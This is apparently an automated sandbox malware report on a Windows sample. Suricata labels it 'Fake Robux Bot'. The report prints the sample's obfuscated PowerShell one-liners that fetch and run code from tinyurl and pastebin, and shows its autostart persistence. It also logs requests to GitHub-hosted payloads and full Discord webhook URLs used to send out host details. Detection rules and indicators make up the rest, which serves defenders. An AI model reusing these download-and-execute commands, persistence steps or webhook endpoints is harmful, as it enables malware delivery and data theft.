Windows Analysis Report
vF20HtY4a4.exe

Overview

General Information

Sample name: vF20HtY4a4.exe (renamed because original name is a hash value)
Original sample name: f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332.exe
Analysis ID: 1534114
MD5: d17a39ca8331a4ce65261b1b6dc7e6ac
SHA1: 7972d0341973a0816d2534f187676f9c00dc38c7
SHA256: f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332
Tags: exe, Neth3N, user-JAMESWT_MHT

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to a URL shortener service
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • vF20HtY4a4.exe (PID: 6032 cmdline: "C:\Users\user\Desktop\vF20HtY4a4.exe" MD5: D17A39CA8331A4CE65261B1B6DC7E6AC)
    • conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • attrib.exe (PID: 5164 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 4820 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6200 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 3900 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4260 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 5632
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x1260ab:$b1: ::WriteAllBytes(
  • 0x1a578b:$b1: ::WriteAllBytes(
  • 0x46a33:$s1: -join
  • 0x54a0b:$s1: -join
  • 0x591ef:$s1: -join
  • 0x1605c5:$s1: -join
  • 0x160d25:$s1: -join
  • 0xc3cb1:$s3: reverse
  • 0xc3f9f:$s3: reverse
  • 0xc46b9:$s3: reverse
  • 0xc4e72:$s3: reverse
  • 0xcbdce:$s3: reverse
  • 0xcc1e8:$s3: reverse
  • 0xccd70:$s3: reverse
  • 0xcda1d:$s3: reverse
  • 0xf9873:$s3: reverse
  • 0x1004f5:$s3: reverse
  • 0x10239d:$s3: reverse
  • 0x10d3cc:$s3: reverse
  • 0x172e15:$s3: reverse
  • 0x17e561:$s3: reverse
Source: Process Memory Space: powershell.exe PID: 5336
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0xc4442:$b1: ::WriteAllBytes(
  • 0x56dce:$s1: -join
  • 0x5752e:$s1: -join
  • 0x8e351:$s1: -join
  • 0x958b3:$s1: -join
  • 0xc9d8a:$s3: reverse
  • 0xd3dc0:$s3: reverse
  • 0xf47f2:$s3: reverse
  • 0xfff21:$s3: reverse
  • 0x14ef01:$s3: reverse
  • 0x14f1ef:$s3: reverse
  • 0x14f909:$s3: reverse
  • 0x1500c2:$s3: reverse
  • 0x157000:$s3: reverse
  • 0x15741a:$s3: reverse
  • 0x157fa2:$s3: reverse
  • 0x158c4f:$s3: reverse
  • 0x16b9e6:$s3: reverse
  • 0x172668:$s3: reverse
  • 0x1744fb:$s3: reverse
  • 0x17f52a:$s3: reverse
Source: amsi64_5632.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
Source: amsi64_5336.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 6032, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3364, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3364, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 6032, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3364, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 6032, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3364, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vF20HtY4a4.exe", ParentImage: C:\Users\user\Desktop\vF20HtY4a4.exe, ParentProcessId: 6032, ParentProcessName: vF20HtY4a4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing), ProcessId: 3364, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T16:08:45.790087+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 162.159.136.232 | 443 | TCP
2024-10-15T16:08:53.748074+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.8 | 49719 | 162.159.136.232 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T16:08:33.538671+0200 | 2857658 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 162.159.136.232 | 443 | TCP

AV Detection

Source: vF20HtY4a4.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 88.2% probability
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49719 version: TLS 1.2
Source: vF20HtY4a4.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbAC source: powershell.exe, 00000009.00000002.2015256142.000001FD29726000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000009.00000002.2014277292.000001FD294F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2118591643.00000210EA688000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbr source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdb source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbI source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb6 source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbW source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb( source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbdatetime source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb#D source: powershell.exe, 00000009.00000002.2015256142.000001FD29726000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD297DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2117616989.00000210EA5FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscoree.dllKC:/Users/GLaDOS/The/Cake/Is/A/Lie.pdb source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbe089R source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: powershell.exe, 0000000E.00000002.2119928343.00000210EA911000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32\Win Jh source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdba source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdbSHA256 source: vF20HtY4a4.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb( source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbm source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.8:49718 -> 162.159.136.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.8:49719 -> 162.159.136.232:443
Source: Network traffic | Suricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.8:49713 -> 162.159.136.232:443
Source: unknown | DNS query: name: pastebin.com
Source: unknown | DNS query: name: tinyurl.com
Source: unknown | DNS query: name: tinyurl.com
Source: Joe Sandbox View | IP Address: 162.159.136.232
Source: Joe Sandbox View | IP Address: 104.20.4.235
Source: Joe Sandbox View | IP Address: 104.20.4.235
Source: Joe Sandbox View | IP Address: 104.18.111.161
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: FASTLYUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 216 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 297 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 297 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bdhpvpny HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: tinyurl.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bdhpvpny HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: tinyurl.com | Connection: Keep-Alive
